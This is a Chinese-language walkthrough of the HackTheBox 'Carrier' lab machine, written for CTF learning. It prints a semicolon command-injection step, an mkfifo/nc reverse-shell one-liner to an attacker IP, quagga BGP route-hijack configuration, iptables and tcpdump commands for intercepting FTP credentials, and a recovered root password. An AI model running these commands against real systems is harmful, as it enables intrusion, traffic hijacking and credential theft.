HTB-靶机-Carrier

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.105

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.105 -o ./Carrier-autorecon

开放了21，22，80，还有udp端口161

看以下爆破的目录

访问一下目录看下

 

收集到上面的信息，可以得出登录remote.php页面的账户和密码，具体如下：

1.通过snmpwalk得出了目标设备的序列号
2.根据此页面的错误代码信息http://10.10.10.105/doc/error_codes.pdf，再通过登录界面显示的错误代码45007和45009
3.综合上面两条可以得出账户是admin，密码是序列号NET_45JDX23

使用上面的账户密码登录并点击里面的页面使用burpsuite进行抓包

burpsuite请求包

根据此请求包的相应显示猜测目标在接收上述POST请求之后，类似执行了查看进程的命令，ps aux | grep quagga 所以此处我们是可以通过分号来进行命令执行，测试的时候需要使用base64编码

下面是执行了以下命令ls -la

我们反弹shell

下面经过base64编码之后即可反弹shell

; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 8844 >/tmp/f

成功反弹shell拿到了user.txt内容，看了下此shell的IP地址和arp信息，发现本机并非靶机10.10.10.105 我们还是需要继续探测

此shell靶机是Linux操作系统上通过软件quagga搭建的思科软路由操作系统，可以当作路由器来使用，这里所用到的知识点涉及到BGP路由劫持技术，详情请查看如下链接补充

https://www.cloudflare.com/zh-cn/learning/security/glossary/bgp-hijacking/
https://www.freebuf.com/articles/network/75305.html
https://ti.qianxin.com/uploads/2018/08/27/8ae73e3c6734f0d2001d848cfb323d01.pdf

下面是配置BGP路由劫持，完成完成后就可以本地使用nc监听21端口获取ftp的账户和密码或者使用tcpdump都可以，此账户和密码同样可以使用ssh登录到目标靶机上

r1# conf t
r1(config)# ip prefix-list leak permit 10.120.15.0/25
r1(config)# route-map to-as200 permit 10
r1(config-route-map)# match ip address prefix-list leak
r1(config-route-map)# set community no-export
r1(config-route-map)# route-map to-as200 permit 20
r1(config-route-map)# route-map to-as300 deny 10
r1(config-route-map)# match ip address prefix-list leak
r1(config-route-map)# route-map to-as300 permit 20
r1(config-route-map)# router bgp 100
r1(config-router)# network 10.120.15.0 mask 255.255.255.128
r1(config-router)# end
r1#

tcpdump -vv -s0 -ni eth2 -c 10 port 21
或者
nc -lvnp 21
也可以使用iptable将21端口使用nat技术转到本地kali的21端口然后nc监听
iptables -t nat -A PREROUTING -p tcp --dport 21 -j DNAT --to-destination 10.10.14.6:21
iptables -t nat -A POSTROUTING -j MASQUERADE

我这里测试监听21端口拿账户和密码有些问题，不知道啥原因，有测试成功的同学反馈下，最终的账户和密码是

root/BGPtelc0rout1ng